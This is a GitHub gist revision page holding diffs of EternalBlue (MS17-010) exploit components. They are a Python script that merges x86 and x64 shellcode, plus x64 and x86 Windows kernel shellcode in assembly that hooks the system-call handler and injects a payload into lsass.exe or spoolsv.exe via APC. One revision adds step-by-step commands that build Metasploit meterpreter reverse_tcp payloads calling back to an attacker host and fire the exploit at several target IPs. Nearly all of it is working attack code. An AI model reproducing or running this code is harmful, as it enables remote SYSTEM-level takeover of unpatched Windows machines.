Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save buglessdr/cf275aad876b8cee46c0b95068d106d2 to your computer and use it in GitHub Desktop.
Save buglessdr/cf275aad876b8cee46c0b95068d106d2 to your computer and use it in GitHub Desktop.

Revisions

  1. @worawit worawit revised this gist Jun 19, 2017. 3 changed files with 3 additions and 0 deletions.
    1 change: 1 addition & 0 deletions eternalblue_merge_shellcode.py
    Original file line number Diff line number Diff line change
    @@ -1,3 +1,4 @@
    # This file has no update anymore. Please see https://github.com/worawit/MS17-010
    import sys
    from struct import pack

    1 change: 1 addition & 0 deletions eternalblue_x64_kshellcode.asm
    Original file line number Diff line number Diff line change
    @@ -1,3 +1,4 @@
    ; This file has no update anymore. Please see https://github.com/worawit/MS17-010
    ;
    ; Windows x64 kernel shellcode from ring 0 to ring 3 by sleepya
    ; The shellcode is written for eternalblue exploit:
    1 change: 1 addition & 0 deletions eternalblue_x86_kshellcode.asm
    Original file line number Diff line number Diff line change
    @@ -1,3 +1,4 @@
    ; This file has no update anymore. Please see https://github.com/worawit/MS17-010
    ;
    ; Windows x86 kernel shellcode from ring 0 to ring 3 by sleepya
    ; The shellcode is written for eternalblue exploit:
  2. @worawit worawit revised this gist Jun 3, 2017. 1 changed file with 35 additions and 0 deletions.
    35 changes: 35 additions & 0 deletions eternalblue_merge_shellcode.py
    Original file line number Diff line number Diff line change
    @@ -18,3 +18,38 @@
    fp.write(sc_x86)
    fp.write(sc_x64)
    fp.close()

    '''
    Example usage with metasploit meterpreter:
    msf > use exploit/multi/handler
    msf exploit(handler) > set ExitOnSession false
    msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
    msf exploit(handler) > set EXITFUNC thread
    msf exploit(handler) > set LHOST 0.0.0.0
    msf exploit(handler) > set LPORT 4444
    msf exploit(handler) > exploit -j
    ...
    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    msf exploit(handler) > set LPORT 4445
    msf exploit(handler) > exploit -j
    ...
    $ msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=192.168.13.37 LPORT=4444
    ...
    $ msfvenom -p windows/meterpreter/reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=192.168.13.37 LPORT=4445
    ...
    $ cat sc_x64_kernel.bin sc_x64_msf.bin > sc_x64.bin
    $ cat sc_x86_kernel.bin sc_x86_msf.bin > sc_x86.bin
    $ python eternalblue_merge_shellcode.py sc_x86.bin sc_x64.bin sc_all.bin
    $ python eternalblue7_exploit.py 192.168.13.81 sc_all.bin
    ...
    $ python eternalblue7_exploit.py 192.168.13.82 sc_all.bin
    ...
    $ python eternalblue7_exploit.py 192.168.13.83 sc_all.bin
    ...
    $ python eternalblue7_exploit.py 192.168.13.84 sc_all.bin
    ...
    '''
  3. @worawit worawit revised this gist Jun 2, 2017. 3 changed files with 684 additions and 82 deletions.
    20 changes: 20 additions & 0 deletions eternalblue_merge_shellcode.py
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,20 @@
    import sys
    from struct import pack

    if len(sys.argv) < 4:
    print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0]))
    sys.exit()

    sc_x86 = open(sys.argv[1], 'rb').read()
    sc_x64 = open(sys.argv[2], 'rb').read()

    fp = open(sys.argv[3], 'wb')
    '''
    \x31\xc0 xor eax, eax
    \x40 inc eax
    \x0f\x84???? jz sc_x64
    '''
    fp.write('\x31\xc0\x40\x0f\x84'+pack('<I', len(sc_x86)))
    fp.write(sc_x86)
    fp.write(sc_x64)
    fp.close()
    181 changes: 99 additions & 82 deletions eternalblue_kshellcode.asm → eternalblue_x64_kshellcode.asm
    Original file line number Diff line number Diff line change
    @@ -11,7 +11,7 @@
    ; Note:
    ; - The userland shellcode is run in a new thread of system process.
    ; If userland shellcode causes any exception, the system process get killed.
    ; - On idle target with multiple core processors, the hijacked system call might take a while (> 3 minutes) to
    ; - On idle target with multiple core processors, the hijacked system call might take a while (> 5 minutes) to
    ; get call because system call is called on other processors.
    ; - The shellcode do not allocate shadow stack if possible for minimal shellcode size.
    ; It is ok because some Windows function does not require shadow stack.
    @@ -67,8 +67,9 @@ setup_syscall_hook:
    mov [rdx+0x40], ecx
    %endif
    call find_data_address_fn
    mov r8, rax
    push rbp
    call set_rbp_data_address_fn
    ; read current syscall
    mov ecx, 0xc0000082
    @@ -79,27 +80,28 @@ setup_syscall_hook:
    je _setup_syscall_hook_done
    ; if (saved_original_syscall != &KiSystemCall64) do_first_time_initialize
    cmp dword [r8+DATA_ORIGIN_SYSCALL_OFFSET], eax
    cmp dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET], eax
    je _hook_syscall
    ; save original syscall
    mov dword [r8+DATA_ORIGIN_SYSCALL_OFFSET+4], edx
    mov dword [r8+DATA_ORIGIN_SYSCALL_OFFSET], eax
    mov dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET+4], edx
    mov dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET], eax
    ; first time on the target, clear the data area
    xor edx, edx
    mov qword [r8+DATA_NT_KERNEL_ADDR_OFFSET], rdx
    mov qword [r8+DATA_QUEUEING_KAPC_OFFSET], rdx
    ; first time on the target
    mov byte [rbp+DATA_QUEUEING_KAPC_OFFSET], 0

    _hook_syscall:
    ; set a new syscall on running processor
    ; setting MSR 0xc0000082 affects only running processor
    mov rdx, r9
    mov eax, edx
    xchg r9, rax
    push rax
    pop rdx ; mov rdx, rax
    shr rdx, 32
    wrmsr
    _setup_syscall_hook_done:
    pop rbp
    %ifdef WIN7
    xor eax, eax
    %elifdef WIN8
    @@ -109,16 +111,17 @@ _setup_syscall_hook_done:

    ;========================================================================
    ; Find memory address in HAL heap for using as data area
    ; Return: rbp = data address
    ;========================================================================
    find_data_address_fn:
    set_rbp_data_address_fn:
    ; On idle target without user application, syscall on hijacked processor might not be called immediately.
    ; Find some address to store the data, the data in this address MUST not be modified
    ; when exploit is rerun before syscall is called
    lea rax, [rel _find_data_address_next + 0x1000]
    _find_data_address_next:
    shr rax, 12
    shl rax, 12
    sub rax, 0x70 ; for KAPC struct too
    lea rbp, [rel _set_rbp_data_address_fn_next + 0x1000]
    _set_rbp_data_address_fn_next:
    shr rbp, 12
    shl rbp, 12
    sub rbp, 0x70 ; for KAPC struct too
    ret


    @@ -133,8 +136,7 @@ syscall_hook:
    ; save rax first to make this function continue to real syscall
    push rax
    push rbp ; save rbp here because rbp is special register for accessing this shellcode data
    call find_data_address_fn
    mov rbp, rax
    call set_rbp_data_address_fn
    mov rax, [rbp+DATA_ORIGIN_SYSCALL_OFFSET]
    add rax, 0x1f ; adjust syscall entry, so we do not need to reverse start of syscall handler
    mov [rsp+0x10], rax
    @@ -149,11 +151,19 @@ syscall_hook:
    ; use lock cmpxchg for queueing APC only one at a time
    xor eax, eax
    cdq
    mov dl, 1
    lock cmpxchg byte [rbp+DATA_QUEUEING_KAPC_OFFSET], dl
    jnz _syscall_hook_done

    ;======================================
    ; restore syscall
    ;======================================
    ; an error after restoring syscall should never occur
    mov ecx, 0xc0000082
    mov eax, [rbp+DATA_ORIGIN_SYSCALL_OFFSET]
    mov edx, [rbp+DATA_ORIGIN_SYSCALL_OFFSET+4]
    wrmsr
    ; allow interrupts while executing shellcode
    sti
    call r3_to_r0_start
    @@ -174,20 +184,11 @@ r3_to_r0_start:
    ; save used non-volatile registers
    push r15
    push r14
    push r13
    push rdi
    push rsi
    push rbx
    push rax ; align stack by 0x10

    ;======================================
    ; restore syscall
    ;======================================
    ; an error after restoring syscall should never occur
    mov ecx, 0xc0000082
    mov eax, [rbp+DATA_ORIGIN_SYSCALL_OFFSET]
    mov edx, [rbp+DATA_ORIGIN_SYSCALL_OFFSET+4]
    wrmsr
    ;======================================
    ; find nt kernel address
    ;======================================
    @@ -209,42 +210,55 @@ _x64_find_nt_walk_page:
    mov r14, qword [gs:0x188] ; get _ETHREAD pointer from KPCR
    mov edi, PSGETCURRENTPROCESS_HASH
    call win_api_direct
    xchg r13, rax ; r13 = EPROCESS
    xchg rcx, rax ; rcx = EPROCESS
    ; r15 : nt kernel address
    ; r14 : ETHREAD
    ; r13 : EPROCESS
    ; rcx : EPROCESS
    ;======================================
    ; find offset of EPROCESS.ImageFilename
    ;======================================
    mov edi, PSGETPROCESSIMAGEFILENAME_HASH
    call get_offset_from_fn
    mov ecx, eax ; ecx = offset of EPROCESS.ImageFilename
    call get_proc_addr
    mov eax, dword [rax+3] ; get offset from code (offset of ImageFilename is always > 0x7f)
    mov ebx, eax ; ebx = offset of EPROCESS.ImageFilename


    ;======================================
    ; find offset of EPROCESS.ThreadListHead
    ;======================================
    ; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+)
    ; if offset of ImageFilename is more than 0x400, current is (Win8+)
    %ifdef WIN7
    lea rdx, [rax+0x28]
    %elifdef WIN8
    lea rdx, [rax+0x38]
    %else
    cmp eax, 0x400 ; eax is still an offset of EPROCESS.ImageFilename
    jb _find_eprocess_threadlist_offset_win7
    add eax, 0x10
    _find_eprocess_threadlist_offset_win7:
    lea rbx, [rax+0x28] ; ebx = offset of EPROCESS.ThreadListHead
    lea rdx, [rax+0x28] ; edx = offset of EPROCESS.ThreadListHead
    %endif

    ;======================================
    ; find offset of ETHREAD.ThreadListEntry
    ;======================================
    lea r8, [r13+rbx] ; r8 = address of EPROCESS.ThreadListHead
    %ifdef COMPACT
    lea r9, [rcx+rdx] ; r9 = ETHREAD listEntry
    %else
    lea r8, [rcx+rdx] ; r8 = address of EPROCESS.ThreadListHead
    mov r9, r8
    %endif
    ; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700
    _find_ethread_threadlist_offset_loop:
    mov r9, qword [r9]
    %ifndef COMPACT
    cmp r8, r9 ; check end of list
    je _insert_queue_apc_done ; not found !!!
    %endif
    ; if (r9 - r14 < 0x700) found
    mov rax, r9
    sub rax, r14
    @@ -257,24 +271,27 @@ _find_ethread_threadlist_offset_loop:
    ; find offset of EPROCESS.ActiveProcessLinks
    ;======================================
    mov edi, PSGETPROCESSID_HASH
    call get_offset_from_fn
    lea rdx, [rax+8] ; edx = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)
    call get_proc_addr
    mov edi, dword [rax+3] ; get offset from code (offset of UniqueProcessId is always > 0x7f)
    add edi, 8 ; edi = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)

    ;======================================
    ; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock
    ;======================================
    ; check process name
    _find_target_process_loop:
    lea rsi, [r13+rcx]
    lea rsi, [rcx+rbx]
    call calc_hash
    cmp eax, LSASS_EXE_HASH ; "lsass.exe"
    %ifndef COMPACT
    jz found_target_process
    cmp eax, SPOOLSV_EXE_HASH ; "spoolsv.exe"
    %endif
    jz found_target_process
    ; next process
    mov r13, [r13+rdx]
    sub r13, rdx
    mov rcx, [rcx+rdi]
    sub rcx, rdi
    jmp _find_target_process_loop


    @@ -286,7 +303,7 @@ found_target_process:
    ; save process PEB for finding CreateThread address in kernel KAPC routine
    ;======================================
    mov edi, PSGETPROCESSPEB_HASH
    mov rcx, r13
    ; rcx is EPROCESS. no need to set it.
    call win_api_direct
    mov [rbp+DATA_PEB_ADDR_OFFSET], rax
    @@ -296,19 +313,29 @@ found_target_process:
    ;======================================
    ; r15 = nt
    ; r14 = -(offset of ETHREAD.ThreadListEntry)
    ; r13 = EPROCESS
    ; ebx = offset of EPROCESS.ThreadListHead
    lea rsi, [r13 + rbx] ; rsi = ThreadListHead address
    ; rcx = EPROCESS
    ; edx = offset of EPROCESS.ThreadListHead

    %ifdef COMPACT
    lea rbx, [rcx + rdx]
    %else
    lea rsi, [rcx + rdx] ; rsi = ThreadListHead address
    mov rbx, rsi ; use rbx for iterating thread
    %endif

    ; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset.
    ; Moreover, alertable thread need to be waiting state which is more difficult to check.
    ; try queueing APC then check KAPC member is more reliable.
    _insert_queue_apc_loop:
    ; TODO: do not try to queue APC if TEB.ActivationContextStackPointer is NULL
    ; if TEB.ActivationContextStackPointer is NULL, system will be reboot after inserting APC to queue
    ; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front
    mov rbx, [rbx+8]
    %ifndef COMPACT
    cmp rsi, rbx
    je _insert_queue_apc_loop ; skip list head
    %endif
    ; KeInitializeApc(PKAPC,
    ; PKTHREAD,
    @@ -362,10 +389,10 @@ _insert_queue_apc_done:
    ; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.

    _r3_to_r0_done:
    pop rax
    pop rbx
    pop rsi
    pop rdi
    pop r13
    pop r14
    pop r15
    ret
    @@ -397,8 +424,7 @@ get_proc_addr:

    ; use rax to find EAT
    mov eax, dword [r15+60] ; Get PE header e_lfanew
    add rax, r15
    mov eax, dword [rax+136] ; Get export tables RVA
    mov eax, dword [r15+rax+136] ; Get export tables RVA

    add rax, r15
    push rax ; save EAT
    @@ -454,23 +480,6 @@ _calc_hash_loop:
    pop rdx
    ret

    ;========================================================================
    ; Get offset of structure member from Windows function that simply return value of struct member.
    ;
    ; Arguments: r15 = module pointer
    ; edi = hash of target function name
    ; Return: eax = offset
    ;========================================================================
    get_offset_from_fn:
    call get_proc_addr
    cmp byte [rax+2], 0x80
    ja _get_offset_dword
    movzx eax, byte [rax+3]
    ret
    _get_offset_dword:
    mov eax, dword [rax+3]
    ret


    ; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.
    ; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().
    @@ -485,16 +494,17 @@ _get_offset_dword:
    ; IN PVOID *SystemArgument2)
    kernel_kapc_routine:
    push rbp
    push rbx
    push rdi
    push rsi
    push r14
    push r15
    mov rbp, [r8] ; *NormalContext is our data area pointer
    mov r15, [rbp+DATA_NT_KERNEL_ADDR_OFFSET]
    mov rsi, rdx
    mov r14, r9
    push rdx
    pop rsi ; mov rsi, rdx
    mov rbx, r9
    ;======================================
    ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)
    @@ -516,47 +526,54 @@ kernel_kapc_routine:
    mov edi, ZWALLOCATEVIRTUALMEMORY_HASH
    call win_api_direct
    add rsp, 0x30
    %ifndef COMPACT
    ; check error
    test eax, eax
    jnz _kernel_kapc_routine_exit
    %endif
    ;======================================
    ; copy userland payload
    ;======================================
    mov rdi, [rsi]
    lea rsi, [rel userland_start]
    mov ecx, 0x800 ; fix payload size to 2048 bytes
    mov ecx, 0x600 ; fix payload size to 1536 bytes
    rep movsb
    ;======================================
    ; find CreateThread address (in kernel32.dll)
    ;======================================
    mov rax, [rbp+DATA_PEB_ADDR_OFFSET]
    mov rdx, [rax + 0x18] ; PEB->Ldr
    mov rdx, [rdx + 0x20] ; InMemoryOrder list
    mov rax, [rax + 0x18] ; PEB->Ldr
    mov rax, [rax + 0x20] ; InMemoryOrder list

    %ifdef COMPACT
    mov rsi, [rax] ; first one always be executable, skip it
    lodsq ; skip ntdll.dll
    %else
    _find_kernel32_dll_loop:
    mov rdx, [rdx] ; first one always be executable
    mov rax, [rax] ; first one always be executable
    ; offset 0x38 (WORD) => must be 0x40 (full name len c:\windows\system32\kernel32.dll)
    ; offset 0x48 (WORD) => must be 0x18 (name len kernel32.dll)
    ; offset 0x50 => is name
    ; offset 0x20 => is dllbase
    ;cmp word [rdx+0x38], 0x40
    ;cmp word [rax+0x38], 0x40
    ;jne _find_kernel32_dll_loop
    cmp word [rdx+0x48], 0x18
    cmp word [rax+0x48], 0x18
    jne _find_kernel32_dll_loop
    mov rax, [rdx+0x50]
    mov rdx, [rax+0x50]
    ; check only "32" because name might be lowercase or uppercase
    cmp dword [rax+0xc], 0x00320033 ; 3\x002\x00
    cmp dword [rdx+0xc], 0x00320033 ; 3\x002\x00
    jnz _find_kernel32_dll_loop
    mov r15, [rdx+0x20]
    %endif

    mov r15, [rax+0x20]
    mov edi, CREATETHREAD_HASH
    call get_proc_addr

    ; save CreateThread address to SystemArgument1
    mov [r14], rax
    mov [rbx], rax
    _kernel_kapc_routine_exit:
    xor ecx, ecx
    @@ -567,9 +584,9 @@ _kernel_kapc_routine_exit:
    mov cr8, rcx
    pop r15
    pop r14
    pop rsi
    pop rdi
    pop rbx
    pop rbp
    ret

    565 changes: 565 additions & 0 deletions eternalblue_x86_kshellcode.asm
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,565 @@
    ;
    ; Windows x86 kernel shellcode from ring 0 to ring 3 by sleepya
    ; The shellcode is written for eternalblue exploit:
    ; - https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a
    ;
    ;
    ; Idea for Ring 0 to Ring 3 via APC from Sean Dillon (@zerosum0x0)
    ;
    ;
    ; Note:
    ; - The userland shellcode is run in a new thread of system process.
    ; If userland shellcode causes any exception, the system process get killed.
    ; - On idle target with multiple core processors, the hijacked system call might take a while (> 5 minutes) to
    ; get call because system call is called on other processors.
    ; - The userland payload MUST be appened to this shellcode.
    ;
    ; Reference:
    ; - http://www.geoffchappell.com/studies/windows/km/index.htm (structures info)
    ; - https://github.com/reactos/reactos/blob/master/reactos/ntoskrnl/ke/apc.c

    BITS 32
    ORG 0


    PSGETCURRENTPROCESS_HASH EQU 0xdbf47c78
    PSGETPROCESSID_HASH EQU 0x170114e1
    PSGETPROCESSIMAGEFILENAME_HASH EQU 0x77645f3f
    LSASS_EXE_HASH EQU 0xc1fa6a5a
    SPOOLSV_EXE_HASH EQU 0x3ee083d8
    ZWALLOCATEVIRTUALMEMORY_HASH EQU 0x576e99ea
    KEINITIALIZEAPC_HASH EQU 0x6d195cc4
    KEINSERTQUEUEAPC_HASH EQU 0xafcc4634
    PSGETPROCESSPEB_HASH EQU 0xb818b848
    CREATETHREAD_HASH EQU 0x835e515e



    DATA_ORIGIN_SYSCALL_OFFSET EQU 0x0
    DATA_MODULE_ADDR_OFFSET EQU 0x4
    DATA_QUEUEING_KAPC_OFFSET EQU 0x8
    DATA_EPROCESS_OFFSET EQU 0xc
    DATA_KAPC_OFFSET EQU 0x10

    section .text
    global shellcode_start

    shellcode_start:

    setup_syscall_hook:
    ; IRQL is DISPATCH_LEVEL when got code execution
    %ifdef WIN7
    mov eax, [esp+0x20] ; fetch SRVNET_BUFFER address from function argument
    ; set nByteProcessed to free corrupted buffer after return
    mov ecx, [eax+0x14]
    mov [eax+0x1c], ecx
    %elifdef WIN8
    %endif
    pushad

    call _setup_syscall_hook_find_eip
    _setup_syscall_hook_find_eip:
    pop ebx

    call set_ebp_data_address_fn
    ; read current syscall
    mov ecx, 0x176
    rdmsr
    ; do NOT replace saved original syscall address with hook syscall
    lea edi, [ebx+syscall_hook-_setup_syscall_hook_find_eip]
    cmp eax, edi
    je _setup_syscall_hook_done
    ; if (saved_original_syscall != &KiFastCallEntry) do_first_time_initialize
    cmp dword [ebp+DATA_ORIGIN_SYSCALL_OFFSET], eax
    je _hook_syscall
    ; save original syscall
    mov dword [ebp+DATA_ORIGIN_SYSCALL_OFFSET], eax
    ; first time on the target, clear the data area
    ; edx should be zero from rdmsr
    mov dword [ebp+DATA_QUEUEING_KAPC_OFFSET], edx

    _hook_syscall:
    ; set a new syscall on running processor
    ; setting MSR 0x176 affects only running processor
    mov eax, edi
    xor edx, edx
    wrmsr
    _setup_syscall_hook_done:
    popad
    %ifdef WIN7
    xor eax, eax
    %elifdef WIN8
    xor eax, eax
    %endif
    ret 0x24

    ;========================================================================
    ; Find memory address in HAL heap for using as data area
    ; Arguments: ebx = any address in this shellcode
    ; Return: ebp = data address
    ;========================================================================
    set_ebp_data_address_fn:
    ; On idle target without user application, syscall on hijacked processor might not be called immediately.
    ; Find some address to store the data, the data in this address MUST not be modified
    ; when exploit is rerun before syscall is called
    lea ebp, [ebx + 0x1000]
    shr ebp, 12
    shl ebp, 12
    sub ebp, 0x50 ; for KAPC struct too
    ret


    syscall_hook:
    mov ecx, 0x23
    push 0x30
    pop fs
    mov ds,cx
    mov es,cx
    mov ecx, dword [fs:0x40]
    mov esp, dword [ecx+4]
    push ecx ; want this stack space to store original syscall addr
    pushfd
    pushad
    call _syscall_hook_find_eip
    _syscall_hook_find_eip:
    pop ebx
    call set_ebp_data_address_fn
    mov eax, [ebp+DATA_ORIGIN_SYSCALL_OFFSET]
    add eax, 0x17 ; adjust syscall entry, so we do not need to reverse start of syscall handler
    mov [esp+0x24], eax ; 0x4 (pushfd) + 0x20 (pushad) = 0x24
    ; use lock cmpxchg for queueing APC only one at a time
    xor eax, eax
    cdq
    inc edx
    lock cmpxchg byte [ebp+DATA_QUEUEING_KAPC_OFFSET], dl
    jnz _syscall_hook_done

    ;======================================
    ; restore syscall
    ;======================================
    ; an error after restoring syscall should never occur
    mov ecx, 0x176
    cdq
    mov eax, [ebp+DATA_ORIGIN_SYSCALL_OFFSET]
    wrmsr
    ; allow interrupts while executing shellcode
    sti
    call r3_to_r0_start
    cli
    _syscall_hook_done:
    popad
    popfd
    ret

    r3_to_r0_start:
    ;======================================
    ; find nt kernel address
    ;======================================
    mov eax, dword [ebp+DATA_ORIGIN_SYSCALL_OFFSET] ; KiFastCallEntry is an address in nt kernel
    shr eax, 0xc ; strip to page size
    shl eax, 0xc

    _find_nt_walk_page:
    sub eax, 0x1000 ; walk along page size
    cmp word [eax], 0x5a4d ; 'MZ' header
    jne _find_nt_walk_page
    ; save nt address
    mov [ebp+DATA_MODULE_ADDR_OFFSET], eax

    ;======================================
    ; get current EPROCESS and ETHREAD
    ;======================================
    mov eax, PSGETCURRENTPROCESS_HASH
    call win_api_direct
    xchg edi, eax ; edi = EPROCESS
    ;======================================
    ; find offset of EPROCESS.ImageFilename
    ;======================================
    mov eax, PSGETPROCESSIMAGEFILENAME_HASH
    push edi
    call win_api_direct
    sub eax, edi
    mov ecx, eax ; ecx = offset of EPROCESS.ImageFilename

    ;======================================
    ; find offset of EPROCESS.ThreadListHead
    ;======================================
    ; possible diff from ImageFilename offset is 0x1c and 0x24 (Win8+)
    ; if offset of ImageFilename is 0x170, current is (Win8+)
    %ifdef WIN7
    lea ebx, [eax+0x1c]
    %elifdef WIN8
    lea ebx, [eax+0x24]
    %else
    cmp eax, 0x170 ; eax is still an offset of EPROCESS.ImageFilename
    jne _find_eprocess_threadlist_offset_win7
    add eax, 0x8
    _find_eprocess_threadlist_offset_win7:
    lea ebx, [eax+0x1c] ; ebx = offset of EPROCESS.ThreadListHead
    %endif

    ;======================================
    ; find offset of ETHREAD.ThreadListEntry
    ;======================================
    ; edi = EPROCESS
    ; ebx = offset of EPROCESS.ThreadListHead
    lea esi, [edi+ebx] ; esi = address of EPROCESS.ThreadListHead
    mov eax, dword [fs:0x124] ; get _ETHREAD pointer from KPCR
    ; ETHREAD.ThreadListEntry must be between ETHREAD (eax) and ETHREAD+0x400
    _find_ethread_threadlist_offset_loop:
    mov esi, dword [esi]
    ; if (esi - edi < 0x400) found
    mov edx, esi
    sub edx, eax
    cmp edx, 0x400
    ja _find_ethread_threadlist_offset_loop ; need unsigned comparison
    push edx ; save offset of ETHREAD.ThreadListEntry to stack


    ;======================================
    ; find offset of EPROCESS.ActiveProcessLinks
    ;======================================
    mov eax, PSGETPROCESSID_HASH
    call get_proc_addr
    mov eax, dword [eax+0xa] ; get offset from code (offset of UniqueProcessId is always > 0x7f)
    lea edx, [eax+4] ; edx = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)
    ;======================================
    ; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock
    ;======================================
    ; edi = EPROCESS
    ; ecx = offset of EPROCESS.ImageFilename
    ; edx = offset of EPROCESS.ActiveProcessLinks
    _find_target_process_loop:
    lea esi, [edi+ecx]
    call calc_hash
    cmp eax, LSASS_EXE_HASH ; "lsass.exe"
    jz found_target_process
    %ifndef COMPACT
    cmp eax, SPOOLSV_EXE_HASH ; "spoolsv.exe"
    jz found_target_process
    %endif
    ; next process
    mov edi, [edi+edx]
    sub edi, edx
    jmp _find_target_process_loop


    found_target_process:
    ; The allocation for userland payload will be in KernelApcRoutine.
    ; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()

    ;======================================
    ; save EPROCESS for finding CreateThread address in kernel KAPC routine
    ;======================================
    mov [ebp+DATA_EPROCESS_OFFSET], edi
    ;======================================
    ; iterate ThreadList until KeInsertQueueApc() success
    ;======================================
    ; edi = EPROCESS
    ; ebx = offset of EPROCESS.ThreadListHead
    lea ebx, [edi+ebx] ; use ebx for iterating thread
    lea esi, [ebp+DATA_KAPC_OFFSET] ; esi = KAPC address
    pop edi ; edi = offset of ETHREAD.ThreadListEntry

    _insert_queue_apc_loop:
    ; TODO: do not try to queue APC if TEB.ActivationContextStackPointer is NULL
    ; if TEB.ActivationContextStackPointer is NULL, system will be reboot after inserting APC to queue
    ; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front
    mov ebx, [ebx+4]
    ; no check list head
    ; KeInitializeApc(PKAPC,
    ; PKTHREAD,
    ; KAPC_ENVIRONMENT = OriginalApcEnvironment (0),
    ; PKKERNEL_ROUTINE = kernel_apc_routine,
    ; PKRUNDOWN_ROUTINE = NULL,
    ; PKNORMAL_ROUTINE = userland_shellcode,
    ; KPROCESSOR_MODE = UserMode (1),
    ; PVOID Context);
    xor eax, eax
    push ebp ; context
    push 1 ; UserMode
    push ebp ; userland shellcode (MUST NOT be NULL)
    push eax ; NULL
    call _init_kapc_find_kroutine
    _init_kapc_find_kroutine:
    add dword [esp], kernel_kapc_routine-_init_kapc_find_kroutine ; KernelApcRoutine
    push eax ; OriginalApcEnvironment
    push ebx
    sub [esp], edi ; ETHREAD
    push esi ; KAPC
    mov eax, KEINITIALIZEAPC_HASH
    call win_api_direct


    ; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);
    ; SystemArgument1 is second argument in usermode code
    ; SystemArgument2 is third argument in usermode code
    xor eax, eax
    push eax
    push eax ; SystemArgument2
    push eax ; SystemArgument1
    push esi ; PKAPC
    mov eax, KEINSERTQUEUEAPC_HASH
    call win_api_direct
    ; if insertion failed, try next thread
    test eax, eax
    jz _insert_queue_apc_loop
    mov eax, [ebp+DATA_KAPC_OFFSET+0xc] ; get KAPC.ApcListEntry
    ; EPROCESS pointer 4 bytes
    ; InProgressFlags 1 byte
    ; KernelApcPending 1 byte
    ; if success, UserApcPending MUST be 1
    cmp byte [eax+0xe], 1
    je _insert_queue_apc_done
    ; manual remove list without lock
    mov [eax], eax
    mov [eax+4], eax
    jmp _insert_queue_apc_loop

    _insert_queue_apc_done:
    ; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.

    _r3_to_r0_done:
    ret

    ;========================================================================
    ; Call function in specific module
    ;
    ; All function arguments are passed as calling normal function with extra register arguments
    ; Extra Arguments: [ebp+DATA_MODULE_ADDR_OFFSET] = module pointer
    ; eax = hash of target function name
    ;========================================================================
    win_api_direct:
    call get_proc_addr
    jmp eax


    ;========================================================================
    ; Get function address in specific module
    ;
    ; Arguments: [ebp+DATA_MODULE_ADDR_OFFSET] = module pointer
    ; eax = hash of target function name
    ; Return: eax = offset
    ;========================================================================
    get_proc_addr:
    pushad

    mov ebp, [ebp+DATA_MODULE_ADDR_OFFSET] ; ebp = module address
    xchg edi, eax ; edi = hash
    mov eax, dword [ebp+0x3c] ; Get PE header e_lfanew
    mov edx, dword [ebp+eax+0x78] ; Get export tables RVA

    add edx, ebp ; edx = EAT

    mov ecx, dword [edx+0x18] ; NumberOfFunctions
    mov ebx, dword [edx+0x20] ; FunctionNames
    add ebx, ebp

    _get_proc_addr_get_next_func:
    ; When we reach the start of the EAT (we search backwards), we hang or crash
    dec ecx ; decrement NumberOfFunctions
    mov esi, dword [ebx+ecx*4] ; Get rva of next module name
    add esi, ebp ; Add the modules base address

    call calc_hash

    cmp eax, edi ; Compare the hashes
    jnz _get_proc_addr_get_next_func ; try the next function

    _get_proc_addr_finish:
    mov ebx, dword [edx+0x24]
    add ebx, ebp ; ordinate table virtual address
    mov cx, word [ebx+ecx*2] ; desired functions ordinal
    mov ebx, dword [edx+0x1c] ; Get the function addresses table rva
    add ebx, ebp ; Add the modules base address
    mov eax, dword [ebx+ecx*4] ; Get the desired functions RVA
    add eax, ebp ; Add the modules base address to get the functions actual VA

    mov [esp+0x1c], eax
    popad
    ret

    ;========================================================================
    ; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.
    ;
    ; Argument: esi = string to hash
    ; Clobber: esi
    ; Return: eax = hash
    ;========================================================================
    calc_hash:
    push edx
    xor eax, eax
    cdq
    _calc_hash_loop:
    lodsb ; Read in the next byte of the ASCII string
    ror edx, 13 ; Rotate right our hash value
    add edx, eax ; Add the next byte of the string
    test eax, eax ; Stop when found NULL
    jne _calc_hash_loop
    xchg edx, eax
    pop edx
    ret



    ; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.
    ; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().
    ; Moreover, there is no lock when calling KernelApcRoutine.
    ;
    ; VOID KernelApcRoutine(
    ; IN PKAPC Apc,
    ; IN PKNORMAL_ROUTINE *NormalRoutine,
    ; IN PVOID *NormalContext,
    ; IN PVOID *SystemArgument1,
    ; IN PVOID *SystemArgument2)
    kernel_kapc_routine:
    ; reorder stack to make everything easier
    pop eax
